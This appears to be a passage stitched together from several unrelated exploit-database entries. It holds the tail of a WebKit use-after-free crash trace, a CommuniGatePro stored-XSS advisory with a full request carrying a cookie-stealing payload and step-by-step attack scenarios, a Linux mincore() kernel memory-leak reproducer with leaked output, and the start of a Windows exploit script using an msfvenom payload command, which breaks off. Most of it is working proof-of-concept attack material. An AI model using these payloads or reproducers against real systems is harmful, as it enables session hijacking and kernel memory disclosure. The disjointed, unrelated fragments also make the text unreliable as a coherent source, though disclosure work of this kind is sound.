==689==WARNING: Failed to use and restart external symbolizer!
#0 0x114c94a56 in WTF::UniqueRef<WebCore::FrameLoader>::get() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x45a56)
#1 0x1154657ad in WebCore::DocumentLoader::frameLoader() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x8167ad)
#2 0x115466208 in WebCore::DocumentLoader::mainReceivedError(WebCore::ResourceError const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x817208)
#3 0x1154672cc in WebCore::DocumentLoader::cancelMainResourceLoad(WebCore::ResourceError const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x8182cc)
#4 0x115469d2b in WebCore::DocumentLoader::stopLoadingForPolicyChange() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x81ad2b)
#5 0x11546a995 in WebCore::DocumentLoader::continueAfterContentPolicy(WebCore::PolicyAction) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x81b995)
#6 0x1108c81b5 in WebKit::WebFrameLoaderClient::dispatchDecidePolicyForResponse(WebCore::ResourceResponse const&, WebCore::ResourceRequest const&, WTF::Function<void (WebCore::PolicyAction)>&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x77e1b5)
#7 0x115468e8a in WebCore::DocumentLoader::responseReceived(WebCore::ResourceResponse const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x819e8a)
#8 0x114edcdb7 in WebCore::CachedRawResource::responseReceived(WebCore::ResourceResponse const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x28ddb7)
#9 0x1179b42a2 in WebCore::SubresourceLoader::didReceiveResponse(WebCore::ResourceResponse const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2d652a2)
#10 0x1175da5da in auto WebCore::ResourceLoader::loadDataURL()::$_0::operator()<std::optional<WebCore::DataURLDecoder::Result> >(std::optional<WebCore::DataURLDecoder::Result>) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x298b5da)
#11 0x1175d9fba in WTF::Function<void (std::optional<WebCore::DataURLDecoder::Result>)>::CallableWrapper<WebCore::ResourceLoader::loadDataURL()::$_0>::call(std::optional<WebCore::DataURLDecoder::Result>) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x298afba)
#12 0x11535729a in WTF::Function<void (std::optional<WebCore::DataURLDecoder::Result>)>::operator()(std::optional<WebCore::DataURLDecoder::Result>) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x70829a)
#13 0x11535709b in WebCore::DataURLDecoder::DecodingResultDispatcher::timerFired() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x70809b)
#14 0x1237d767d in WTF::timerFired(__CFRunLoopTimer*, void*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1d2467d)
#15 0x7fff8c5dfc53 in __CFRUNLOOP_IS_CALLING_OUT_TO_A_TIMER_CALLBACK_FUNCTION__ (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x90c53)
#16 0x7fff8c5df8de in __CFRunLoopDoTimer (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x908de)
#17 0x7fff8c5df439 in __CFRunLoopDoTimers (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x90439)
#18 0x7fff8c5d6b80 in __CFRunLoopRun (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x87b80)
#19 0x7fff8c5d6113 in CFRunLoopRunSpecific (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x87113)
#20 0x7fff8bb36ebb in RunCurrentEventLoopInMode (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30ebb)
#21 0x7fff8bb36cf0 in ReceiveNextEventCommon (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30cf0)
#22 0x7fff8bb36b25 in _BlockUntilNextEventMatchingListInModeWithFilter (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30b25)
#23 0x7fff8a0cfa53 in _DPSNextEvent (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x46a53)
#24 0x7fff8a84b7ed in -[NSApplication(NSEvent) _nextEventMatchingEventMask:untilDate:inMode:dequeue:] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x7c27ed)
#25 0x7fff8a0c43da in -[NSApplication run] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x3b3da)
#26 0x7fff8a08ee0d in NSApplicationMain (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x5e0d)
#27 0x7fffa1faf8c6 in _xpc_objc_main (/usr/lib/system/libxpc.dylib:x86_64+0x108c6)
#28 0x7fffa1fae2e3 in xpc_main (/usr/lib/system/libxpc.dylib:x86_64+0xf2e3)
#29 0x10ffc956c in main (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/XPCServices/com.apple.WebKit.WebContent.xpc/Contents/MacOS/com.apple.WebKit.WebContent.Development:x86_64+0x10000156c)
#30 0x7fffa1d56234 in start (/usr/lib/system/libdyld.dylib:x86_64+0x5234)
0x6110000889c8 is located 136 bytes inside of 240-byte region [0x611000088940,0x611000088a30)
freed by thread T0 here:
#0 0x113395294 in __sanitizer_mz_free (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/8.1.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib:x86_64h+0x57294)
#1 0x123825650 in bmalloc::Deallocator::deallocateSlowCase(void*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1d72650)
#2 0x11550fb0e in WTF::RefPtr<WebCore::Frame>::operator=(std::nullptr_t) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x8c0b0e)
#3 0x1175d56e9 in WebCore::ResourceLoader::releaseResources() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x29866e9)
#4 0x1175d882c in WebCore::ResourceLoader::cancel(WebCore::ResourceError const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x298982c)
#5 0x1154672b9 in WebCore::DocumentLoader::cancelMainResourceLoad(WebCore::ResourceError const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x8182b9)
#6 0x115469d2b in WebCore::DocumentLoader::stopLoadingForPolicyChange() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x81ad2b)
#7 0x11546a995 in WebCore::DocumentLoader::continueAfterContentPolicy(WebCore::PolicyAction) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x81b995)
#8 0x1108c81b5 in WebKit::WebFrameLoaderClient::dispatchDecidePolicyForResponse(WebCore::ResourceResponse const&, WebCore::ResourceRequest const&, WTF::Function<void (WebCore::PolicyAction)>&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x77e1b5)
#9 0x115468e8a in WebCore::DocumentLoader::responseReceived(WebCore::ResourceResponse const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x819e8a)
#10 0x114edcdb7 in WebCore::CachedRawResource::responseReceived(WebCore::ResourceResponse const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x28ddb7)
#11 0x1179b42a2 in WebCore::SubresourceLoader::didReceiveResponse(WebCore::ResourceResponse const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2d652a2)
#12 0x1175da5da in auto WebCore::ResourceLoader::loadDataURL()::$_0::operator()<std::optional<WebCore::DataURLDecoder::Result> >(std::optional<WebCore::DataURLDecoder::Result>) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x298b5da)
#13 0x1175d9fba in WTF::Function<void (std::optional<WebCore::DataURLDecoder::Result>)>::CallableWrapper<WebCore::ResourceLoader::loadDataURL()::$_0>::call(std::optional<WebCore::DataURLDecoder::Result>) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x298afba)
#14 0x11535729a in WTF::Function<void (std::optional<WebCore::DataURLDecoder::Result>)>::operator()(std::optional<WebCore::DataURLDecoder::Result>) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x70829a)
#15 0x11535709b in WebCore::DataURLDecoder::DecodingResultDispatcher::timerFired() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x70809b)
#16 0x1237d767d in WTF::timerFired(__CFRunLoopTimer*, void*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1d2467d)
#17 0x7fff8c5dfc53 in __CFRUNLOOP_IS_CALLING_OUT_TO_A_TIMER_CALLBACK_FUNCTION__ (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x90c53)
#18 0x7fff8c5df8de in __CFRunLoopDoTimer (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x908de)
#19 0x7fff8c5df439 in __CFRunLoopDoTimers (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x90439)
#20 0x7fff8c5d6b80 in __CFRunLoopRun (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x87b80)
#21 0x7fff8c5d6113 in CFRunLoopRunSpecific (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x87113)
#22 0x7fff8bb36ebb in RunCurrentEventLoopInMode (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30ebb)
#23 0x7fff8bb36cf0 in ReceiveNextEventCommon (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30cf0)
#24 0x7fff8bb36b25 in _BlockUntilNextEventMatchingListInModeWithFilter (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30b25)
#25 0x7fff8a0cfa53 in _DPSNextEvent (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x46a53)
#26 0x7fff8a84b7ed in -[NSApplication(NSEvent) _nextEventMatchingEventMask:untilDate:inMode:dequeue:] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x7c27ed)
#27 0x7fff8a0c43da in -[NSApplication run] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x3b3da)
#28 0x7fff8a08ee0d in NSApplicationMain (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x5e0d)
#29 0x7fffa1faf8c6 in _xpc_objc_main (/usr/lib/system/libxpc.dylib:x86_64+0x108c6)
previously allocated by thread T0 here:
#0 0x113394d2c in __sanitizer_mz_malloc (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/8.1.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib:x86_64h+0x56d2c)
#1 0x7fffa1ed8281 in malloc_zone_malloc (/usr/lib/system/libsystem_malloc.dylib:x86_64+0x2281)
#2 0x123825ad4 in bmalloc::DebugHeap::malloc(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1d72ad4)
#3 0x123823d6d in bmalloc::Allocator::allocateSlowCase(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1d70d6d)
#4 0x1237aa247 in bmalloc::Allocator::allocate(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1cf7247)
#5 0x1237a963a in WTF::fastMalloc(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1cf663a)
#6 0x114da35b8 in WTF::ThreadSafeRefCountedBase::operator new(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1545b8)
#7 0x115789203 in WebCore::Frame::create(WebCore::Page*, WebCore::HTMLFrameOwnerElement*, WebCore::FrameLoaderClient*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xb3a203)
#8 0x1108b8f00 in WebKit::WebFrame::createSubframe(WebKit::WebPage*, WTF::String const&, WebCore::HTMLFrameOwnerElement*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x76ef00)
#9 0x1108d12eb in WebKit::WebFrameLoaderClient::createFrame(WebCore::URL const&, WTF::String const&, WebCore::HTMLFrameOwnerElement&, WTF::String const&, bool, int, int) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x7872eb)
#10 0x1179a820f in WebCore::SubframeLoader::loadSubframe(WebCore::HTMLFrameOwnerElement&, WebCore::URL const&, WTF::String const&, WTF::String const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2d5920f)
#11 0x1179a637e in WebCore::SubframeLoader::loadOrRedirectSubframe(WebCore::HTMLFrameOwnerElement&, WebCore::URL const&, WTF::AtomicString const&, WebCore::LockHistory, WebCore::LockBackForwardList) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2d5737e)
#12 0x1179a5f57 in WebCore::SubframeLoader::requestFrame(WebCore::HTMLFrameOwnerElement&, WTF::String const&, WTF::AtomicString const&, WebCore::LockHistory, WebCore::LockBackForwardList) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2d56f57)
#13 0x1159cb45e in WebCore::HTMLFrameElementBase::openURL(WebCore::LockHistory, WebCore::LockBackForwardList) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd7c45e)
#14 0x11501be08 in WebCore::ContainerNode::notifyChildInserted(WebCore::Node&, WebCore::ContainerNode::ChildChange const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3cce08)
#15 0x11501a396 in WebCore::ContainerNode::parserAppendChild(WebCore::Node&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3cb396)
#16 0x115961cdc in WebCore::executeInsertTask(WebCore::HTMLConstructionSiteTask&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd12cdc)
#17 0x11595aea7 in WebCore::HTMLConstructionSite::executeQueuedTasks() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd0bea7)
#18 0x11598ac8a in WebCore::HTMLDocumentParser::constructTreeFromHTMLToken(WebCore::HTMLTokenizer::TokenPtr&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd3bc8a)
#19 0x11598a849 in WebCore::HTMLDocumentParser::pumpTokenizerLoop(WebCore::HTMLDocumentParser::SynchronousMode, bool, WebCore::PumpSession&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd3b849)
#20 0x1159899c2 in WebCore::HTMLDocumentParser::pumpTokenizer(WebCore::HTMLDocumentParser::SynchronousMode) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd3a9c2)
#21 0x11598b4e8 in WebCore::HTMLDocumentParser::append(WTF::RefPtr<WTF::StringImpl>&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd3c4e8)
#22 0x115369531 in WebCore::DecodedDataDocumentParser::flush(WebCore::DocumentWriter&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x71a531)
#23 0x1154a663d in WebCore::DocumentWriter::end() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x85763d)
#24 0x115467736 in WebCore::DocumentLoader::finishedLoading() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x818736)
#25 0x114ee3047 in WebCore::CachedResource::checkNotify() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x294047)
#26 0x114edbdf1 in WebCore::CachedRawResource::finishLoading(WebCore::SharedBuffer*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x28cdf1)
#27 0x1179b3661 in WebCore::SubresourceLoader::didFinishLoading(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2d64661)
#28 0x110c5d43b in WebKit::WebResourceLoader::didFinishResourceLoad(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xb1343b)
#29 0x110c606d9 in void IPC::handleMessage<Messages::WebResourceLoader::DidFinishResourceLoad, WebKit::WebResourceLoader, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics const&)>(IPC::Decoder&, WebKit::WebResourceLoader*, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics const&)) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xb166d9)
SUMMARY: AddressSanitizer: heap-use-after-free (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x45a56) in WTF::UniqueRef<WebCore::FrameLoader>::get()
Shadow bytes around the buggy address:
0x1c22000110e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x1c22000110f0: 00 00 00 fa fa fa fa fa fa fa fa fa fa fa fa fa
0x1c2200011100: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x1c2200011110: 00 00 00 00 00 00 00 00 00 00 00 00 fa fa fa fa
0x1c2200011120: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd
=>0x1c2200011130: fd fd fd fd fd fd fd fd fd[fd]fd fd fd fd fd fd
0x1c2200011140: fd fd fd fd fd fd fa fa fa fa fa fa fa fa fa fa
0x1c2200011150: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x1c2200011160: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x1c2200011170: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
0x1c2200011180: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==689==ABORTING
-->
# Exploit Title: CommuniGatePro webmails Multiple Stored XSS
# Date: 15/11/2017
# Exploit Author: Boumediene KADDOUR
# Unit: Algerie Telecom R&D Unit
# Vendor Homepage: https://www.stalker.com/
# Software Link: http://www.stalker.com/ (paid product)
# Version: 6.1.16 and earlier (fixed in 6.2.1; for 6.1.19 the fix ships as a separate Crystal skin package, see the disclosure timeline below)
# Tested on: a production server, targeting the Crystal, Pronto and Pronto4 webmail skins, with payloads delivered from Gmail and Hotmail accounts.
CommuniGatePro 6.1.16 webmails (Crystal, Pronto and Pronto4) suffer from multiple stored XSS vulnerabilities. The details below illustrate the impact of this vulnerability.
Vulnerability Description:
XSS flaws occur whenever an application includes untrusted data in a new web page without proper validation or escaping, or updates an existing web page with user supplied data using a browser API that can create JavaScript. XSS allows attackers to execute scripts in the victim’s browser which can hijack user sessions, deface web sites, or redirect the user to malicious sites.
Vulnerability details (Stored XSS):
Exploiting this vulnerability allowed us to achieve the following:
Take control of the victim's mailbox simply by having the victim read an email
Potentially compromise the victim's workstation when an outdated browser such as Internet Explorer 8 (widely used in our company) is used
Send emails on behalf of the victim
Deface the whole victim mailbox
Invoke the malicious piece of code each time an attachment's sent to the victim.
Vulnerable sections:
Calendar
Files
Tasks
Notes
Inbox
Attack Narratives and Scenarios:
1. Calendar:
Source webmail: tested with gmail and hotmail
Destination webmail: Crystal
To deliver our PoC we used a Google Calendar invitation as the carrier: the event title (the `text` parameter in the request below) holds the payload, and the invitation is addressed to the target mailbox via the `add` parameter.
PoC:
POST /calendar/event HTTP/1.1
Host: calendar.google.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://calendar.google.com/calendar/render?tab=mc
X-If-No-Redirect: 1
X-Is-Xhr-Request: 1
Content-Type: application/x-www-form-urlencoded;charset=utf-8
Content-Length: 634
Cookie: Mycookie
Connection: close
sf=true&output=js&action=CREATE&useproto=true&add=boumediene.k%40victim.dz%2Csnbemail%40gmail.com&crm=BUSY&icc=DEFAULT&sprop=goo.allowModify%3Afalse&sprop=goo.allowInvitesOther%3Atrue&sprop=goo.showInvitees%3Atrue&pprop=eventColor%3Anone&eid=762dgnlok9l44rd63im4kisjnd&eref=762dgnlok9l33rd55im4kisjnd&cts=1511425384353&text=%22%3E%3Cimg%20src%3DX%20onerror%3Dalert(document.cookie)%3E&location=Stored%20XSS&details=Stored%20XSS&src=snbemail%40gmail.com&dates=20171123T093000%2F20171123T103000&unbounded=false&gdoc-attachment&scfdata=W1tdXQ..&stz&etz&scp=ONE&nopts=2&nopts=3&nopts=4&hl=en_GB&secid=6VLs1BGsgBB_Tqz6egnXpCYYF24
Once the victim receives the invitation, he/she is not required to click any link or download any file: the only condition for this PoC to work is that the victim opens (reads) the email. At that point the injected code executes in the victim's browser and ends up sending sensitive data (here, document.cookie) to the adversary.
2. Files:
Source webmail: pronto/pronto4/Crystal
Destination webmail: Crystal
To leverage this vulnerability, the attacker must first have a local mailbox. The attacker then does the following:
Go to file section.
Create a directory
Name the directory with any JavaScript code, in our case (<img src=X onerror=alert(document.cookie)>)
Share or grant access to victim to be able to at least read the content of the directory
The victim then receives the email granting access to that directory
The victim reads the email and then opens the directory, which executes the payload in the victim's session
3. Notes:
Source webmail: Crystal
Destination webmail: Crystal
To leverage this vulnerability, the attacker must first have a local mailbox. The attacker then does the following:
Create a note
Put the JavaScript code within it
Share it with the victim
4. Tasks:
Source webmail: pronto/pronto4
Destination webmail: Crystal
To leverage this vulnerability, the attacker must first have a local mailbox. The attacker then does the following:
Create a task
Put the JavaScript code within the task name
publish it
5. Inbox
Source webmail: pronto/pronto4
Destination webmail: Crystal
To leverage this vulnerability, the attacker must first have a local mailbox. The attacker then does the following:
Create an html file with malicious JavaScript piece of code
Make use of Pronto to send the email to the victim
The victim reads the email using Crystal webmail and the code gets executed.
Remediation:
Contextually encode every user-controlled field before it is rendered in the webmail UI (calendar event titles, shared folder names, note bodies, task names), and render HTML email bodies and attachments only after sanitising them against an allow-list of tags and attributes. Validating input on the way in is a useful second layer but does not replace output encoding.
Vulnerability Disclosure Timeline:
==================================
23 Nov, 17 5:36:09 PM: Vendor Notification
23 Nov, 17 6:56:33 PM: Vendor Response/Feedback
24 Nov, 17 : Vendor released new patched version 6.2.1 and included fixes on version 6.1.19 as a separate Crystal skin package (to be installed as cluster/server-wide custom skin)
/*
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1431
I found the following bug with an AFL-based fuzzer:
When __walk_page_range() is used on a VM_HUGETLB VMA, callbacks from the mm_walk structure are only invoked for present pages. However, do_mincore() assumes that it will always get callbacks for all pages in the range passed to walk_page_range(), and when this assumption is violated, sys_mincore() copies uninitialized memory from the page allocator to userspace.
This bug can be reproduced with the following testcase:
$ cat mincore_test.c
*/
#define _GNU_SOURCE
#include <unistd.h>
#include <sys/mman.h>
#include <err.h>
#include <stdio.h>
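/* Scratch vector for mincore(): one status byte per page, so 0x1000 entries
 * cover the 0x1000000-byte window queried below (assuming 4 KiB pages).  It
 * is a zero-initialised global, so any non-zero bytes that show up in the
 * output came from the kernel, not from this program. */
unsigned char mcbuf[0x1000];

/*
 * Reproducer: map a huge (0x20000000000 = 2 TiB), never-touched MAP_HUGETLB
 * region and repeatedly ask mincore() about a 16 MiB window inside it.  As
 * described in the write-up above, no page in the window is present, so the
 * page-walk callbacks do_mincore() relies on are never invoked and the bytes
 * copied back to user space are uninitialised kernel memory.  The raw vector
 * is streamed to stdout so it can be inspected with hexdump.
 *
 * Returns 0 on completion; exits with status 1 (via err) if the mapping or a
 * write to stdout fails.  A failed mincore() is reported but the loop keeps
 * going, as in the original testcase.
 */
int main(void) {
    /* Fixed address + MAP_NORESERVE keep the reservation cheap; the region
     * is never touched, so no huge pages are actually populated. */
    if (mmap((void *)0x66000000, 0x20000000000, PROT_NONE,
             MAP_SHARED | MAP_ANONYMOUS | MAP_HUGETLB | MAP_NORESERVE,
             -1, 0) == MAP_FAILED)
        err(1, "mmap");

    for (int i = 0; i < 10000; i++) {
        /* 0x86000000 lies inside the mapping; 0x1000000 bytes == 0x1000 pages. */
        if (mincore((void *)0x86000000, 0x1000000, mcbuf))
            perror("mincore");
        /* Dump the whole vector; stop on a short or failed write (e.g. EPIPE
         * once the reader has gone away) rather than silently spinning. */
        if (write(1, mcbuf, 0x1000) != 0x1000)
            err(1, "write");
    }
    return 0;
}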
/*
$ gcc -o mincore_test mincore_test.c -Wall
$ ./mincore_test | hexdump -C | head
00000000 00 00 00 00 00 00 00 00 00 00 00 00 fe 01 00 00 |................|
00000010 80 49 3d 20 c6 e9 ff ff c0 49 3d 20 c6 e9 ff ff |.I= .....I= ....|
00000020 00 08 3c 20 c6 e9 ff ff 40 08 3c 20 c6 e9 ff ff |..< ....@.< ....|
00000030 80 08 3c 20 c6 e9 ff ff c0 08 3c 20 c6 e9 ff ff |..< ......< ....|
00000040 00 09 3c 20 c6 e9 ff ff 40 09 3c 20 c6 e9 ff ff |..< ....@.< ....|
00000050 80 09 3c 20 c6 e9 ff ff c0 09 3c 20 c6 e9 ff ff |..< ......< ....|
00000060 00 06 3c 20 c6 e9 ff ff 40 06 3c 20 c6 e9 ff ff |..< ....@.< ....|
00000070 80 06 3c 20 c6 e9 ff ff c0 06 3c 20 c6 e9 ff ff |..< ......< ....|
00000080 00 07 3c 20 c6 e9 ff ff 40 07 3c 20 c6 e9 ff ff |..< ....@.< ....|
00000090 80 07 3c 20 c6 e9 ff ff 80 78 84 0b c6 e9 ff ff |..< .....x......|
Fixed upstream in https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=373c4557d2aa362702c4c2d41288fb1e54990b7c
The fix has landed in the following upstream stable releases:
https://cdn.kernel.org/pub/linux/kernel/v4.x/ChangeLog-4.14.2
https://cdn.kernel.org/pub/linux/kernel/v4.x/ChangeLog-4.13.16
https://cdn.kernel.org/pub/linux/kernel/v4.x/ChangeLog-4.9.65
https://cdn.kernel.org/pub/linux/kernel/v4.x/ChangeLog-4.4.101
*/
#!/usr/bin/python
# Tested on: Windows 10 Professional (x86)
# Exploit for previous version: https://www.exploit-db.com/exploits/42455/ (Seems they haven't patched the vulnerability at all :D)
# msfvenom -p windows/exec CMD="calc.exe" -e x86/unicode_mixed BufferRegister=EAX -f python
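# Payload produced by the msfvenom command above: x86/unicode_mixed-encoded
# windows/exec that launches calc.exe, with EAX expected to point at the
# start of the payload (BufferRegister=EAX).  Bytes literals are used
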